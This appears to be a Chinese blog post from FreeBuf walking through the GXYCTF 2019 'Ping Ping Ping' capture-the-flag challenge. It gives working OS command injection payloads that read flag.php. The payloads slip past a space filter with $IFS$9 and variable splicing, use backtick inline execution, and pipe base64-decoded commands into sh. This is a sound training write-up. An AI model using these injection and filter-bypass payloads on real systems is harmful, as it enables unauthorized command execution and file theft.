freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

GXYCTF 2019 | 题目解析之Ping Ping Ping
无名草 2021-05-19 21:58:29 289928

Ping Ping Ping

进入题目

肯定先Ping一下本地IP:127.0.0.1
能连接上

然后用**ls**关键字列出当前目录的内容

1621431914_60a5166ab09adfcf9393c.png!small?1621431914356接着我们肯定想查看flag.php里面的值
用**cat**命令查看文件内容,
还有其他查看命令主要是tac,head,more,tail,less
显示空格被过滤了;
一般空格过滤绕过的方法:

{cat,flag};   ${IFS$;   $IFS$9;   <;   <>;

经过测试用空格用**$IFS$9**绕过;
然后变量**拼接,倒序**得到payload:

?ip=127.0.0.1;a=ag;b=fl;cat$IFS$1$b$a.php
也可以?ip=127.0.0.1;a=lag;cat$IFS$9f$a.php

1621432029_60a516ddb83e9343a6f5d.png!small?1621432029374

解法2:

内联执行绕过
将**反引号内**命令的输出作为输入执行

?ip=|cat$IFS$9`ls`

解法3:

虽然过滤了bash,但没过滤sh,可以使用下面的方法:

ip=1;echo$IFS$9Y2F0IGZsYWcucGhw|base64$IFS$9-d|sh

推荐写的***很好***的关于此类题目的文章

https://www.codenong.com/cs105422347/

# 渗透测试 # web安全
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 无名草 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
CTF WP
无名草 LV.6
这家伙太懒了,还未填写个人描述!
  • 50 文章数
  • 86 关注者
文件上传解析漏洞(三)
2022-03-27
服务器端请求伪造--SSRF
2022-03-24
逻辑漏洞之支付漏洞
2022-03-19
文章目录